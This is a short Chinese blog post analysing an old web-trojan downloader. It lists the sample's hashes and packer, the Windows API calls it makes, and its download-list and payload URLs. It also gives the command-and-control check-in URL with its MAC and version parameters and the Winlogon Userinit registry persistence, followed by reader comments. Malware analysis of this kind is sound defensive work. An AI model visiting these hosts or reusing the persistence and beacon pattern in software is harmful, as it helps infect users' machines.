简单分析一个网马

  • A+
所属分类:lcx

看到个帖子:

http://www.90sec.org/thread-2363-1-1.html

360报毒在本机缓存发现,求解密。。


网马样本为:2010年4月的极风0day网马,很老的网马了,分析如下:

小马地址:

http://58.221.45.182:8112/1.exe

Size: 6.44 KB (6,600 Bytes)

MD5: 4ae45ec367c6276780b94e4963c8fc7c

SHA1: 63d98487caed469ff9cbb8245b9c560f8fb8fafa

SHA256: b2f323cba81e4c7d76909693f3834f44cdb4a117321fedc9f6d94135e9a31280

加了压缩壳:

MD5: 4AE45EC367C6276780B94E4963C8FC7C

NSpack V3.7 -> LiuXingPing

脱壳后:

MD5: EC0B34FC81395DA811D2EE7209CE8F40

大小: 27.5 KB (28,219 字节)

Microsoft Visual C++ 6.0

调用敏感函数:

URLDownloadToFileA //下载文件并保存

WinExec //执行某个程序

DeleteFileA //删除指定文件

CopyFileA //复制文件

GetAdaptersInfo //获取网卡详细信息

一般是用来获取网卡MAC地址,控制系统用来统计唯一安装客户端数量用的。

下载列表地址:

http://ucc.iiuaa.com:1234/www1.txt

内容:

http://kk.utherar.com:7654/pd.exe

http://kk.utherar.com:7654/qsk.exe

http://kk.utherar.com:7654/chaj.exe

http://kk.utherar.com:7654/qse.exe

http://kk.utherar.com:7654/qso.exe

http://kk.utherar.com:7654/qsa.exe

http://kk.utherar.com:7654/qst.exe

http://kk.utherar.com:7654/qsq.exe

http://kk.utherar.com:7654/cpc.exe

http://kk.utherar.com:7654/gr.exe

上线地址:

http://118.129.161.180:900/getparams.ashx

会给上线系统提交以下内容:

%s?mac=%s&pnum=%d&ver=%s

说明:

http://118.129.161.180:900/getparams.ashx?mac=网卡MAC&pnum=整形数字(进程ID?)&ver=版本号

配置文件:

%c%c%c%c%c.ini

写注册表:

路径:LMSoftwareMicrosoftDownloadManager

路径:LMSoftwareMicrosoftWindows NTCurrentVersionWinlogon

子项:Userinit

类型:REG_SZ/REG_SZ

大小:68/200

值:C:WINDOWSsystem32userinit.exe,C:WINDOWSTasksconime.exe"

正常的值为:"C:Windowssystem32userinit.exe,"

作用:开机自启动,C:WINDOWSTasksconime.exe 为安装路径。

搞笑的是,还写了个:ASCII "nimamabidedongxi",“你妈妈逼的东西”。

╮(╯_╰)╭

API 操作:

C:TESTsample.exe 0x40178c CopyFileA(lpExistingFileName: "C:TESTsample.exe", lpNewFileName: "C:WINDOWSTasksconime.exe", bFailIfExists: 0x0)|0x1

总体评价:

垃圾下载者一个,所有下载执行操作几乎全部调用的普通 API,没有任何绕过主动防御的代码。

目测该下载者无法绕过任何主动防御,而且代码很简单,被杀很严重。

估计是直接网上找了个源码,改了改就用了,无语……

留言评论(旧系统):

【匿名者】 @ 2012-05-21 15:45:48

90sec?是个什么样的组织?可否大致介绍下?

本站回复:

一个论坛,聚集了一些伪黑客,水准一般。

日月 @ 2012-05-21 15:57:36

我发现看核老大的分析文章 受益颇多。
尼玛,一时居然没想起查看当前用户名和组的命令了,回去补基础 555

本站回复:

╮(╯_╰)╭

【匿名者】 @ 2012-05-21 21:41:49

这个分析看起来像是金山的那个分析啊

本站回复:

跟金山有毛关系?

文章来源于lcx.cc:简单分析一个网马

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: